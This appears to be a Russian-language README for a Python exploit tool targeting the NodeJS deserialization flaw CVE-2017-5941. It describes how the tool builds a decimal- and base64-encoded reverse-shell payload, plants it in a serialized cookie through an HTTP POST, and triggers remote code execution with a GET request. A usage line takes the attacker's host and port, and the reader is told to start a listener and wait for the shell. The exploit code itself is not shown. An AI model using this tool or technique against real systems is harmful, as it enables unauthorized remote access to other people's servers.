
Эксплойт обратной оболочки для десериализации в NodeJs (CVE-2017-5941)
Эксплойт автоматически генерирует полезную нагрузку reverse shell, которая кодируется в десятичном формате, а затем в base64. После этого эта полезная нагрузка отправляется через HTTP POST запрос, который сериализует ввод пользователя и сохраняет его в cookie. Затем мы получаем RCE, обращаясь через GET запрос.
Использование:
python3 nodejshell.py <lhost> <lport>
lhost: ваш локальный IP-адрес lport: порт, к которому вы хотите подключить свою reverse shell
После этого вам нужно предоставить всего несколько простых данных:
После этого просто активируйте ваш предпочитаемый listener и ждите получения соединения.
